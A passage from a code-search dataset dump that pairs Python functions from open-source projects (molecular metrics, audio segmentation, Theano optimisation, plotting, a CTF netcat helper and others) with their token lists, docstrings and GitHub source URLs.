pool = Pool(n_jobs)
close_pool = True
else:
pool = 1
metrics['valid'] = fraction_valid(gen, n_jobs=pool)
gen = remove_invalid(gen, canonize=True)
if not isinstance(k, (list, tuple)):
k = [k]
for _k in k:
metrics['unique@{}'.format(_k)] = fraction_unique(gen, _k, pool)
if ptest is None:
ptest = compute_intermediate_statistics(test, n_jobs=n_jobs,
device=device,
batch_size=batch_size,
pool=pool)
if test_scaffolds is not None and ptest_scaffolds is None:
ptest_scaffolds = compute_intermediate_statistics(
test_scaffolds, n_jobs=n_jobs,
device=device, batch_size=batch_size,
pool=pool
)
mols = mapper(pool)(get_mol, gen)
kwargs = {'n_jobs': pool, 'device': device, 'batch_size': batch_size}
kwargs_fcd = {'n_jobs': n_jobs, 'device': device, 'batch_size': batch_size}
metrics['FCD/Test'] = FCDMetric(**kwargs_fcd)(gen=gen, pref=ptest['FCD'])
metrics['SNN/Test'] = SNNMetric(**kwargs)(gen=mols, pref=ptest['SNN'])
metrics['Frag/Test'] = FragMetric(**kwargs)(gen=mols, pref=ptest['Frag'])
metrics['Scaf/Test'] = ScafMetric(**kwargs)(gen=mols, pref=ptest['Scaf'])
if ptest_scaffolds is not None:
metrics['FCD/TestSF'] = FCDMetric(**kwargs_fcd)(
gen=gen, pref=ptest_scaffolds['FCD']
)
metrics['SNN/TestSF'] = SNNMetric(**kwargs)(
gen=mols, pref=ptest_scaffolds['SNN']
)
metrics['Frag/TestSF'] = FragMetric(**kwargs)(
gen=mols, pref=ptest_scaffolds['Frag']
)
metrics['Scaf/TestSF'] = ScafMetric(**kwargs)(
gen=mols, pref=ptest_scaffolds['Scaf']
)
metrics['IntDiv'] = internal_diversity(mols, pool, device=device)
metrics['IntDiv2'] = internal_diversity(mols, pool, device=device, p=2)
metrics['Filters'] = fraction_passes_filters(mols, pool)
# Properties
for name, func in [('logP', logP), ('SA', SA),
('QED', QED),
('weight', weight)]:
metrics[name] = WassersteinMetric(func, **kwargs)(
gen=mols, pref=ptest[name])
if train is not None:
metrics['Novelty'] = novelty(mols, train, pool)
enable_rdkit_log()
if close_pool:
pool.close()
pool.join()
return metrics
|
[
"def",
"get_all_metrics",
"(",
"gen",
",",
"k",
"=",
"None",
",",
"n_jobs",
"=",
"1",
",",
"device",
"=",
"'cpu'",
",",
"batch_size",
"=",
"512",
",",
"pool",
"=",
"None",
",",
"test",
"=",
"None",
",",
"test_scaffolds",
"=",
"None",
",",
"ptest",
"=",
"None",
",",
"ptest_scaffolds",
"=",
"None",
",",
"train",
"=",
"None",
")",
":",
"if",
"test",
"is",
"None",
":",
"if",
"ptest",
"is",
"not",
"None",
":",
"raise",
"ValueError",
"(",
"\"You cannot specify custom test \"",
"\"statistics for default test set\"",
")",
"test",
"=",
"get_dataset",
"(",
"'test'",
")",
"ptest",
"=",
"get_statistics",
"(",
"'test'",
")",
"if",
"test_scaffolds",
"is",
"None",
":",
"if",
"ptest_scaffolds",
"is",
"not",
"None",
":",
"raise",
"ValueError",
"(",
"\"You cannot specify custom scaffold test \"",
"\"statistics for default scaffold test set\"",
")",
"test_scaffolds",
"=",
"get_dataset",
"(",
"'test_scaffolds'",
")",
"ptest_scaffolds",
"=",
"get_statistics",
"(",
"'test_scaffolds'",
")",
"train",
"=",
"train",
"or",
"get_dataset",
"(",
"'train'",
")",
"if",
"k",
"is",
"None",
":",
"k",
"=",
"[",
"1000",
",",
"10000",
"]",
"disable_rdkit_log",
"(",
")",
"metrics",
"=",
"{",
"}",
"close_pool",
"=",
"False",
"if",
"pool",
"is",
"None",
":",
"if",
"n_jobs",
"!=",
"1",
":",
"pool",
"=",
"Pool",
"(",
"n_jobs",
")",
"close_pool",
"=",
"True",
"else",
":",
"pool",
"=",
"1",
"metrics",
"[",
"'valid'",
"]",
"=",
"fraction_valid",
"(",
"gen",
",",
"n_jobs",
"=",
"pool",
")",
"gen",
"=",
"remove_invalid",
"(",
"gen",
",",
"canonize",
"=",
"True",
")",
"if",
"not",
"isinstance",
"(",
"k",
",",
"(",
"list",
",",
"tuple",
")",
")",
":",
"k",
"=",
"[",
"k",
"]",
"for",
"_k",
"in",
"k",
":",
"metrics",
"[",
"'unique@{}'",
".",
"format",
"(",
"_k",
")",
"]",
"=",
"fraction_unique",
"(",
"gen",
",",
"_k",
",",
"pool",
")",
"if",
"ptest",
"is",
"None",
":",
"ptest",
"=",
"compute_intermediate_statistics",
"(",
"test",
",",
"n_jobs",
"=",
"n_jobs",
",",
"device",
"=",
"device",
",",
"batch_size",
"=",
"batch_size",
",",
"pool",
"=",
"pool",
")",
"if",
"test_scaffolds",
"is",
"not",
"None",
"and",
"ptest_scaffolds",
"is",
"None",
":",
"ptest_scaffolds",
"=",
"compute_intermediate_statistics",
"(",
"test_scaffolds",
",",
"n_jobs",
"=",
"n_jobs",
",",
"device",
"=",
"device",
",",
"batch_size",
"=",
"batch_size",
",",
"pool",
"=",
"pool",
")",
"mols",
"=",
"mapper",
"(",
"pool",
")",
"(",
"get_mol",
",",
"gen",
")",
"kwargs",
"=",
"{",
"'n_jobs'",
":",
"pool",
",",
"'device'",
":",
"device",
",",
"'batch_size'",
":",
"batch_size",
"}",
"kwargs_fcd",
"=",
"{",
"'n_jobs'",
":",
"n_jobs",
",",
"'device'",
":",
"device",
",",
"'batch_size'",
":",
"batch_size",
"}",
"metrics",
"[",
"'FCD/Test'",
"]",
"=",
"FCDMetric",
"(",
"*",
"*",
"kwargs_fcd",
")",
"(",
"gen",
"=",
"gen",
",",
"pref",
"=",
"ptest",
"[",
"'FCD'",
"]",
")",
"metrics",
"[",
"'SNN/Test'",
"]",
"=",
"SNNMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest",
"[",
"'SNN'",
"]",
")",
"metrics",
"[",
"'Frag/Test'",
"]",
"=",
"FragMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest",
"[",
"'Frag'",
"]",
")",
"metrics",
"[",
"'Scaf/Test'",
"]",
"=",
"ScafMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest",
"[",
"'Scaf'",
"]",
")",
"if",
"ptest_scaffolds",
"is",
"not",
"None",
":",
"metrics",
"[",
"'FCD/TestSF'",
"]",
"=",
"FCDMetric",
"(",
"*",
"*",
"kwargs_fcd",
")",
"(",
"gen",
"=",
"gen",
",",
"pref",
"=",
"ptest_scaffolds",
"[",
"'FCD'",
"]",
")",
"metrics",
"[",
"'SNN/TestSF'",
"]",
"=",
"SNNMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest_scaffolds",
"[",
"'SNN'",
"]",
")",
"metrics",
"[",
"'Frag/TestSF'",
"]",
"=",
"FragMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest_scaffolds",
"[",
"'Frag'",
"]",
")",
"metrics",
"[",
"'Scaf/TestSF'",
"]",
"=",
"ScafMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest_scaffolds",
"[",
"'Scaf'",
"]",
")",
"metrics",
"[",
"'IntDiv'",
"]",
"=",
"internal_diversity",
"(",
"mols",
",",
"pool",
",",
"device",
"=",
"device",
")",
"metrics",
"[",
"'IntDiv2'",
"]",
"=",
"internal_diversity",
"(",
"mols",
",",
"pool",
",",
"device",
"=",
"device",
",",
"p",
"=",
"2",
")",
"metrics",
"[",
"'Filters'",
"]",
"=",
"fraction_passes_filters",
"(",
"mols",
",",
"pool",
")",
"# Properties",
"for",
"name",
",",
"func",
"in",
"[",
"(",
"'logP'",
",",
"logP",
")",
",",
"(",
"'SA'",
",",
"SA",
")",
",",
"(",
"'QED'",
",",
"QED",
")",
",",
"(",
"'weight'",
",",
"weight",
")",
"]",
":",
"metrics",
"[",
"name",
"]",
"=",
"WassersteinMetric",
"(",
"func",
",",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest",
"[",
"name",
"]",
")",
"if",
"train",
"is",
"not",
"None",
":",
"metrics",
"[",
"'Novelty'",
"]",
"=",
"novelty",
"(",
"mols",
",",
"train",
",",
"pool",
")",
"enable_rdkit_log",
"(",
")",
"if",
"close_pool",
":",
"pool",
".",
"close",
"(",
")",
"pool",
".",
"join",
"(",
")",
"return",
"metrics"
] |
https://github.com/molecularsets/moses/blob/7b8f83b21a9b7ded493349ec8ef292384ce2bb52/moses/metrics/metrics.py#L17-L146
|
|
researchmm/tasn
|
5dba8ccc096cedc63913730eeea14a9647911129
|
tasn-mxnet/benchmark/python/sparse/memory_benchmark.py
|
python
|
bench_dot
|
(lhs_row_dim, lhs_col_dim, rhs_col_dim, density,
rhs_density, dot_func, trans_lhs, lhs_stype,
rhs_stype, only_storage, distribution="uniform")
|
Benchmarking both storage and dot
|
Benchmarking both storage and dot
|
[
"Benchmarking",
"both",
"storage",
"and",
"dot"
] |
def bench_dot(lhs_row_dim, lhs_col_dim, rhs_col_dim, density,
rhs_density, dot_func, trans_lhs, lhs_stype,
rhs_stype, only_storage, distribution="uniform"):
""" Benchmarking both storage and dot
"""
lhs_nd = rand_ndarray((lhs_row_dim, lhs_col_dim), lhs_stype, density, distribution=distribution)
if not only_storage:
rhs_nd = rand_ndarray((lhs_col_dim, rhs_col_dim), rhs_stype,
density=rhs_density, distribution=distribution)
out = dot_func(lhs_nd, rhs_nd, trans_lhs)
mx.nd.waitall()
|
[
"def",
"bench_dot",
"(",
"lhs_row_dim",
",",
"lhs_col_dim",
",",
"rhs_col_dim",
",",
"density",
",",
"rhs_density",
",",
"dot_func",
",",
"trans_lhs",
",",
"lhs_stype",
",",
"rhs_stype",
",",
"only_storage",
",",
"distribution",
"=",
"\"uniform\"",
")",
":",
"lhs_nd",
"=",
"rand_ndarray",
"(",
"(",
"lhs_row_dim",
",",
"lhs_col_dim",
")",
",",
"lhs_stype",
",",
"density",
",",
"distribution",
"=",
"distribution",
")",
"if",
"not",
"only_storage",
":",
"rhs_nd",
"=",
"rand_ndarray",
"(",
"(",
"lhs_col_dim",
",",
"rhs_col_dim",
")",
",",
"rhs_stype",
",",
"density",
"=",
"rhs_density",
",",
"distribution",
"=",
"distribution",
")",
"out",
"=",
"dot_func",
"(",
"lhs_nd",
",",
"rhs_nd",
",",
"trans_lhs",
")",
"mx",
".",
"nd",
".",
"waitall",
"(",
")"
] |
https://github.com/researchmm/tasn/blob/5dba8ccc096cedc63913730eeea14a9647911129/tasn-mxnet/benchmark/python/sparse/memory_benchmark.py#L79-L89
|
||
Qirky/FoxDot
|
76318f9630bede48ff3994146ed644affa27bfa4
|
FoxDot/lib/SCLang/SynthDef.py
|
python
|
SynthDefBaseClass.get_base_class_variables
|
(self)
|
return "var {};".format(", ".join(self.var))
|
[] |
def get_base_class_variables(self):
return "var {};".format(", ".join(self.var))
|
[
"def",
"get_base_class_variables",
"(",
"self",
")",
":",
"return",
"\"var {};\"",
".",
"format",
"(",
"\", \"",
".",
"join",
"(",
"self",
".",
"var",
")",
")"
] |
https://github.com/Qirky/FoxDot/blob/76318f9630bede48ff3994146ed644affa27bfa4/FoxDot/lib/SCLang/SynthDef.py#L183-L184
|
|||
ctfs/write-ups-2014
|
b02bcbb2737907dd0aa39c5d4df1d1e270958f54
|
asis-ctf-finals-2014/xorqr/netcatlib/netcatlib.py
|
python
|
Netcat.read_some
|
(self, amount=1)
|
return buf
|
Read at least one byte of buffered data unless EOF is hit.
Return '' if EOF is hit. Block if no data is immediately
available.
|
Read at least one byte of buffered data unless EOF is hit.
|
[
"Read",
"at",
"least",
"one",
"byte",
"of",
"buffered",
"data",
"unless",
"EOF",
"is",
"hit",
"."
] |
def read_some(self, amount=1):
"""Read at least one byte of buffered data unless EOF is hit.
Return '' if EOF is hit. Block if no data is immediately
available.
"""
while not self.buffer and len(self.buffer) < amount and not self.eof:
self.recv_blocking()
buf = self.buffer
self.buffer = ''
return buf
|
[
"def",
"read_some",
"(",
"self",
",",
"amount",
"=",
"1",
")",
":",
"while",
"not",
"self",
".",
"buffer",
"and",
"len",
"(",
"self",
".",
"buffer",
")",
"<",
"amount",
"and",
"not",
"self",
".",
"eof",
":",
"self",
".",
"recv_blocking",
"(",
")",
"buf",
"=",
"self",
".",
"buffer",
"self",
".",
"buffer",
"=",
"''",
"return",
"buf"
] |
https://github.com/ctfs/write-ups-2014/blob/b02bcbb2737907dd0aa39c5d4df1d1e270958f54/asis-ctf-finals-2014/xorqr/netcatlib/netcatlib.py#L251-L262
|
|
NVIDIA/DeepLearningExamples
|
589604d49e016cd9ef4525f7abcc9c7b826cfc5e
|
TensorFlow/Detection/SSD/models/research/object_detection/metrics/coco_tools.py
|
python
|
COCOEvalWrapper.GetCategory
|
(self, category_id)
|
return self.cocoGt.cats[category_id]
|
Fetches dictionary holding category information given category id.
Args:
category_id: integer id
Returns:
dictionary holding 'id', 'name'.
|
Fetches dictionary holding category information given category id.
|
[
"Fetches",
"dictionary",
"holding",
"category",
"information",
"given",
"category",
"id",
"."
] |
def GetCategory(self, category_id):
"""Fetches dictionary holding category information given category id.
Args:
category_id: integer id
Returns:
dictionary holding 'id', 'name'.
"""
return self.cocoGt.cats[category_id]
|
[
"def",
"GetCategory",
"(",
"self",
",",
"category_id",
")",
":",
"return",
"self",
".",
"cocoGt",
".",
"cats",
"[",
"category_id",
"]"
] |
https://github.com/NVIDIA/DeepLearningExamples/blob/589604d49e016cd9ef4525f7abcc9c7b826cfc5e/TensorFlow/Detection/SSD/models/research/object_detection/metrics/coco_tools.py#L175-L183
|
|
tyiannak/pyAudioAnalysis
|
979c8635e5b6292283b5ee050868d087a55c6371
|
pyAudioAnalysis/audioSegmentation.py
|
python
|
mid_term_file_classification
|
(input_file, model_name, model_type,
plot_results=False, gt_file="")
|
return labels, class_names, accuracy, cm
|
This function performs mid-term classification of an audio stream.
Towards this end, supervised knowledge is used,
i.e. a pre-trained classifier.
ARGUMENTS:
- input_file: path of the input WAV file
- model_name: name of the classification model
- model_type: svm or knn depending on the classifier type
- plot_results: True if results are to be plotted using
matplotlib along with a set of statistics
RETURNS:
- segs: a sequence of segment's endpoints: segs[i] is the
endpoint of the i-th segment (in seconds)
- classes: a sequence of class flags: class[i] is the
class ID of the i-th segment
|
This function performs mid-term classification of an audio stream.
Towards this end, supervised knowledge is used,
i.e. a pre-trained classifier.
ARGUMENTS:
- input_file: path of the input WAV file
- model_name: name of the classification model
- model_type: svm or knn depending on the classifier type
- plot_results: True if results are to be plotted using
matplotlib along with a set of statistics
|
[
"This",
"function",
"performs",
"mid",
"-",
"term",
"classification",
"of",
"an",
"audio",
"stream",
".",
"Towards",
"this",
"end",
"supervised",
"knowledge",
"is",
"used",
"i",
".",
"e",
".",
"a",
"pre",
"-",
"trained",
"classifier",
".",
"ARGUMENTS",
":",
"-",
"input_file",
":",
"path",
"of",
"the",
"input",
"WAV",
"file",
"-",
"model_name",
":",
"name",
"of",
"the",
"classification",
"model",
"-",
"model_type",
":",
"svm",
"or",
"knn",
"depending",
"on",
"the",
"classifier",
"type",
"-",
"plot_results",
":",
"True",
"if",
"results",
"are",
"to",
"be",
"plotted",
"using",
"matplotlib",
"along",
"with",
"a",
"set",
"of",
"statistics"
] |
def mid_term_file_classification(input_file, model_name, model_type,
plot_results=False, gt_file=""):
"""
This function performs mid-term classification of an audio stream.
Towards this end, supervised knowledge is used,
i.e. a pre-trained classifier.
ARGUMENTS:
- input_file: path of the input WAV file
- model_name: name of the classification model
- model_type: svm or knn depending on the classifier type
- plot_results: True if results are to be plotted using
matplotlib along with a set of statistics
RETURNS:
- segs: a sequence of segment's endpoints: segs[i] is the
endpoint of the i-th segment (in seconds)
- classes: a sequence of class flags: class[i] is the
class ID of the i-th segment
"""
labels = []
accuracy = 0.0
class_names = []
cm = np.array([])
if not os.path.isfile(model_name):
print("mtFileClassificationError: input model_type not found!")
return labels, class_names, accuracy, cm
# Load classifier:
if model_type == "knn":
classifier, mean, std, class_names, mt_win, mid_step, st_win, \
st_step, compute_beat = at.load_model_knn(model_name)
else:
classifier, mean, std, class_names, mt_win, mid_step, st_win, \
st_step, compute_beat = at.load_model(model_name)
if compute_beat:
print("Model " + model_name + " contains long-term music features "
"(beat etc) and cannot be used in "
"segmentation")
return labels, class_names, accuracy, cm
# load input file
sampling_rate, signal = audioBasicIO.read_audio_file(input_file)
# could not read file
if sampling_rate == 0:
return labels, class_names, accuracy, cm
# convert stereo (if) to mono
signal = audioBasicIO.stereo_to_mono(signal)
# mid-term feature extraction:
mt_feats, _, _ = \
mtf.mid_feature_extraction(signal, sampling_rate,
mt_win * sampling_rate,
mid_step * sampling_rate,
round(sampling_rate * st_win),
round(sampling_rate * st_step))
posterior_matrix = []
# for each feature vector (i.e. for each fix-sized segment):
for col_index in range(mt_feats.shape[1]):
# normalize current feature v
feature_vector = (mt_feats[:, col_index] - mean) / std
# classify vector:
label_predicted, posterior = \
at.classifier_wrapper(classifier, model_type, feature_vector)
labels.append(label_predicted)
# update probability matrix
posterior_matrix.append(np.max(posterior))
labels = np.array(labels)
# convert fix-sized flags to segments and classes
segs, classes = labels_to_segments(labels, mid_step)
segs[-1] = len(signal) / float(sampling_rate)
# Load grount-truth:
labels_gt, class_names_gt, accuracy, cm = \
load_ground_truth(gt_file, labels, class_names, mid_step, plot_results)
return labels, class_names, accuracy, cm
|
[
"def",
"mid_term_file_classification",
"(",
"input_file",
",",
"model_name",
",",
"model_type",
",",
"plot_results",
"=",
"False",
",",
"gt_file",
"=",
"\"\"",
")",
":",
"labels",
"=",
"[",
"]",
"accuracy",
"=",
"0.0",
"class_names",
"=",
"[",
"]",
"cm",
"=",
"np",
".",
"array",
"(",
"[",
"]",
")",
"if",
"not",
"os",
".",
"path",
".",
"isfile",
"(",
"model_name",
")",
":",
"print",
"(",
"\"mtFileClassificationError: input model_type not found!\"",
")",
"return",
"labels",
",",
"class_names",
",",
"accuracy",
",",
"cm",
"# Load classifier:",
"if",
"model_type",
"==",
"\"knn\"",
":",
"classifier",
",",
"mean",
",",
"std",
",",
"class_names",
",",
"mt_win",
",",
"mid_step",
",",
"st_win",
",",
"st_step",
",",
"compute_beat",
"=",
"at",
".",
"load_model_knn",
"(",
"model_name",
")",
"else",
":",
"classifier",
",",
"mean",
",",
"std",
",",
"class_names",
",",
"mt_win",
",",
"mid_step",
",",
"st_win",
",",
"st_step",
",",
"compute_beat",
"=",
"at",
".",
"load_model",
"(",
"model_name",
")",
"if",
"compute_beat",
":",
"print",
"(",
"\"Model \"",
"+",
"model_name",
"+",
"\" contains long-term music features \"",
"\"(beat etc) and cannot be used in \"",
"\"segmentation\"",
")",
"return",
"labels",
",",
"class_names",
",",
"accuracy",
",",
"cm",
"# load input file",
"sampling_rate",
",",
"signal",
"=",
"audioBasicIO",
".",
"read_audio_file",
"(",
"input_file",
")",
"# could not read file",
"if",
"sampling_rate",
"==",
"0",
":",
"return",
"labels",
",",
"class_names",
",",
"accuracy",
",",
"cm",
"# convert stereo (if) to mono",
"signal",
"=",
"audioBasicIO",
".",
"stereo_to_mono",
"(",
"signal",
")",
"# mid-term feature extraction:",
"mt_feats",
",",
"_",
",",
"_",
"=",
"mtf",
".",
"mid_feature_extraction",
"(",
"signal",
",",
"sampling_rate",
",",
"mt_win",
"*",
"sampling_rate",
",",
"mid_step",
"*",
"sampling_rate",
",",
"round",
"(",
"sampling_rate",
"*",
"st_win",
")",
",",
"round",
"(",
"sampling_rate",
"*",
"st_step",
")",
")",
"posterior_matrix",
"=",
"[",
"]",
"# for each feature vector (i.e. for each fix-sized segment):",
"for",
"col_index",
"in",
"range",
"(",
"mt_feats",
".",
"shape",
"[",
"1",
"]",
")",
":",
"# normalize current feature v",
"feature_vector",
"=",
"(",
"mt_feats",
"[",
":",
",",
"col_index",
"]",
"-",
"mean",
")",
"/",
"std",
"# classify vector:",
"label_predicted",
",",
"posterior",
"=",
"at",
".",
"classifier_wrapper",
"(",
"classifier",
",",
"model_type",
",",
"feature_vector",
")",
"labels",
".",
"append",
"(",
"label_predicted",
")",
"# update probability matrix",
"posterior_matrix",
".",
"append",
"(",
"np",
".",
"max",
"(",
"posterior",
")",
")",
"labels",
"=",
"np",
".",
"array",
"(",
"labels",
")",
"# convert fix-sized flags to segments and classes",
"segs",
",",
"classes",
"=",
"labels_to_segments",
"(",
"labels",
",",
"mid_step",
")",
"segs",
"[",
"-",
"1",
"]",
"=",
"len",
"(",
"signal",
")",
"/",
"float",
"(",
"sampling_rate",
")",
"# Load grount-truth:",
"labels_gt",
",",
"class_names_gt",
",",
"accuracy",
",",
"cm",
"=",
"load_ground_truth",
"(",
"gt_file",
",",
"labels",
",",
"class_names",
",",
"mid_step",
",",
"plot_results",
")",
"return",
"labels",
",",
"class_names",
",",
"accuracy",
",",
"cm"
] |
https://github.com/tyiannak/pyAudioAnalysis/blob/979c8635e5b6292283b5ee050868d087a55c6371/pyAudioAnalysis/audioSegmentation.py#L518-L597
|
|
mkusner/grammarVAE
|
ffffe272a8cf1772578dfc92254c55c224cddc02
|
Theano-master/theano/tensor/opt.py
|
python
|
local_add_mul_fusion
|
(node)
|
Fuse consecutive add or mul in one such node with more inputs.
It is better to fuse add/mul that way then in a Composite node as
this make the inner graph of the Compiste smaller. This allow to
put more computation in a Composite before hitting the max
recusion limit when pickling Composite.
|
Fuse consecutive add or mul in one such node with more inputs.
|
[
"Fuse",
"consecutive",
"add",
"or",
"mul",
"in",
"one",
"such",
"node",
"with",
"more",
"inputs",
"."
] |
def local_add_mul_fusion(node):
"""Fuse consecutive add or mul in one such node with more inputs.
It is better to fuse add/mul that way then in a Composite node as
this make the inner graph of the Compiste smaller. This allow to
put more computation in a Composite before hitting the max
recusion limit when pickling Composite.
"""
if (not isinstance(node.op, Elemwise) or
not isinstance(node.op.scalar_op, (scalar.Add, scalar.Mul))):
return False
s_op = node.op.scalar_op.__class__
for inp in node.inputs:
if (inp.owner and
isinstance(inp.owner.op, Elemwise) and
isinstance(inp.owner.op.scalar_op, s_op)):
l = list(node.inputs)
l.remove(inp)
output_node = node.op(*(l + inp.owner.inputs))
copy_stack_trace(node.outputs[0], output_node)
return [output_node]
|
[
"def",
"local_add_mul_fusion",
"(",
"node",
")",
":",
"if",
"(",
"not",
"isinstance",
"(",
"node",
".",
"op",
",",
"Elemwise",
")",
"or",
"not",
"isinstance",
"(",
"node",
".",
"op",
".",
"scalar_op",
",",
"(",
"scalar",
".",
"Add",
",",
"scalar",
".",
"Mul",
")",
")",
")",
":",
"return",
"False",
"s_op",
"=",
"node",
".",
"op",
".",
"scalar_op",
".",
"__class__",
"for",
"inp",
"in",
"node",
".",
"inputs",
":",
"if",
"(",
"inp",
".",
"owner",
"and",
"isinstance",
"(",
"inp",
".",
"owner",
".",
"op",
",",
"Elemwise",
")",
"and",
"isinstance",
"(",
"inp",
".",
"owner",
".",
"op",
".",
"scalar_op",
",",
"s_op",
")",
")",
":",
"l",
"=",
"list",
"(",
"node",
".",
"inputs",
")",
"l",
".",
"remove",
"(",
"inp",
")",
"output_node",
"=",
"node",
".",
"op",
"(",
"*",
"(",
"l",
"+",
"inp",
".",
"owner",
".",
"inputs",
")",
")",
"copy_stack_trace",
"(",
"node",
".",
"outputs",
"[",
"0",
"]",
",",
"output_node",
")",
"return",
"[",
"output_node",
"]"
] |
https://github.com/mkusner/grammarVAE/blob/ffffe272a8cf1772578dfc92254c55c224cddc02/Theano-master/theano/tensor/opt.py#L6745-L6768
|
||
FriedAppleTeam/FRAPL
|
89c14d57e0cc77b915fe1e95f60e9e1847699103
|
Framework/FridaLink/FridaLink/Core/MemoryEngine.py
|
python
|
MemoryEngineProtocol.generateMemoryID
|
(self, address)
|
return mem_id
|
[] |
def generateMemoryID(self, address):
idx = 0
mem_id = "0x%X_%d" % (address, idx)
while mem_id in self.memoryMap:
idx += 1
mem_id = "0x%X_%d" % (address, idx)
return mem_id
|
[
"def",
"generateMemoryID",
"(",
"self",
",",
"address",
")",
":",
"idx",
"=",
"0",
"mem_id",
"=",
"\"0x%X_%d\"",
"%",
"(",
"address",
",",
"idx",
")",
"while",
"mem_id",
"in",
"self",
".",
"memoryMap",
":",
"idx",
"+=",
"1",
"mem_id",
"=",
"\"0x%X_%d\"",
"%",
"(",
"address",
",",
"idx",
")",
"return",
"mem_id"
] |
https://github.com/FriedAppleTeam/FRAPL/blob/89c14d57e0cc77b915fe1e95f60e9e1847699103/Framework/FridaLink/FridaLink/Core/MemoryEngine.py#L73-L79
|
|||
AppScale/gts
|
46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9
|
AppServer/google/appengine/ext/mapreduce/model.py
|
python
|
MapperSpec.__init__
|
(self,
handler_spec,
input_reader_spec,
params,
shard_count,
output_writer_spec=None)
|
Creates a new MapperSpec.
Args:
handler_spec: handler specification as string (see class doc for
details).
input_reader_spec: The class name of the input reader to use.
params: Dictionary of additional parameters for the mapper.
shard_count: number of shards to process in parallel.
Properties:
handler_spec: name of handler class/function to use.
input_reader_spec: The class name of the input reader to use.
params: Dictionary of additional parameters for the mapper.
shard_count: number of shards to process in parallel.
output_writer_spec: The class name of the output writer to use.
|
Creates a new MapperSpec.
|
[
"Creates",
"a",
"new",
"MapperSpec",
"."
] |
def __init__(self,
handler_spec,
input_reader_spec,
params,
shard_count,
output_writer_spec=None):
"""Creates a new MapperSpec.
Args:
handler_spec: handler specification as string (see class doc for
details).
input_reader_spec: The class name of the input reader to use.
params: Dictionary of additional parameters for the mapper.
shard_count: number of shards to process in parallel.
Properties:
handler_spec: name of handler class/function to use.
input_reader_spec: The class name of the input reader to use.
params: Dictionary of additional parameters for the mapper.
shard_count: number of shards to process in parallel.
output_writer_spec: The class name of the output writer to use.
"""
self.handler_spec = handler_spec
self.input_reader_spec = input_reader_spec
self.output_writer_spec = output_writer_spec
self.shard_count = int(shard_count)
self.params = params
|
[
"def",
"__init__",
"(",
"self",
",",
"handler_spec",
",",
"input_reader_spec",
",",
"params",
",",
"shard_count",
",",
"output_writer_spec",
"=",
"None",
")",
":",
"self",
".",
"handler_spec",
"=",
"handler_spec",
"self",
".",
"input_reader_spec",
"=",
"input_reader_spec",
"self",
".",
"output_writer_spec",
"=",
"output_writer_spec",
"self",
".",
"shard_count",
"=",
"int",
"(",
"shard_count",
")",
"self",
".",
"params",
"=",
"params"
] |
https://github.com/AppScale/gts/blob/46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9/AppServer/google/appengine/ext/mapreduce/model.py#L375-L401
|
||
quodlibet/quodlibet
|
e3099c89f7aa6524380795d325cc14630031886c
|
quodlibet/qltk/songmodel.py
|
python
|
PlaylistMux.unqueue
|
(self, songs)
|
Remove all occurrences of all passed songs in the queue
|
Remove all occurrences of all passed songs in the queue
|
[
"Remove",
"all",
"occurrences",
"of",
"all",
"passed",
"songs",
"in",
"the",
"queue"
] |
def unqueue(self, songs):
"""Remove all occurrences of all passed songs in the queue"""
q = self.q
for iter_ in q.find_all(songs):
q.remove(iter_)
|
[
"def",
"unqueue",
"(",
"self",
",",
"songs",
")",
":",
"q",
"=",
"self",
".",
"q",
"for",
"iter_",
"in",
"q",
".",
"find_all",
"(",
"songs",
")",
":",
"q",
".",
"remove",
"(",
"iter_",
")"
] |
https://github.com/quodlibet/quodlibet/blob/e3099c89f7aa6524380795d325cc14630031886c/quodlibet/qltk/songmodel.py#L139-L144
|
||
yt-project/yt
|
dc7b24f9b266703db4c843e329c6c8644d47b824
|
yt/visualization/plot_container.py
|
python
|
PlotContainer.get_log
|
(self, field)
|
return log
|
get the transform type of a field.
Parameters
----------
field : string
the field to get a transform
if field == 'all', applies to all plots.
|
get the transform type of a field.
|
[
"get",
"the",
"transform",
"type",
"of",
"a",
"field",
"."
] |
def get_log(self, field):
"""get the transform type of a field.
Parameters
----------
field : string
the field to get a transform
if field == 'all', applies to all plots.
"""
# devnote : accepts_all_fields decorator is not applicable here because
# the return variable isn't self
log = {}
if field == "all":
fields = list(self.plots.keys())
else:
fields = field
for field in self.data_source._determine_fields(fields):
log[field] = self._field_transform[field] == log_transform
return log
|
[
"def",
"get_log",
"(",
"self",
",",
"field",
")",
":",
"# devnote : accepts_all_fields decorator is not applicable here because",
"# the return variable isn't self",
"log",
"=",
"{",
"}",
"if",
"field",
"==",
"\"all\"",
":",
"fields",
"=",
"list",
"(",
"self",
".",
"plots",
".",
"keys",
"(",
")",
")",
"else",
":",
"fields",
"=",
"field",
"for",
"field",
"in",
"self",
".",
"data_source",
".",
"_determine_fields",
"(",
"fields",
")",
":",
"log",
"[",
"field",
"]",
"=",
"self",
".",
"_field_transform",
"[",
"field",
"]",
"==",
"log_transform",
"return",
"log"
] |
https://github.com/yt-project/yt/blob/dc7b24f9b266703db4c843e329c6c8644d47b824/yt/visualization/plot_container.py#L316-L335
|
|
LeGoffLoic/Nodz
|
0ee255c62883f7a374a9de6cbcf555e3352e5dec
|
nodz_main.py
|
python
|
SlotItem.paint
|
(self, painter, option, widget)
|
Paint the Slot.
|
Paint the Slot.
|
[
"Paint",
"the",
"Slot",
"."
] |
def paint(self, painter, option, widget):
"""
Paint the Slot.
"""
painter.setBrush(self.brush)
painter.setPen(self.pen)
nodzInst = self.scene().views()[0]
config = nodzInst.config
if nodzInst.drawingConnection:
if self.parentItem() == nodzInst.currentHoveredNode:
painter.setBrush(utils._convertDataToColor(config['non_connectable_color']))
if (self.slotType == nodzInst.sourceSlot.slotType or (self.slotType != nodzInst.sourceSlot.slotType and self.dataType != nodzInst.sourceSlot.dataType)):
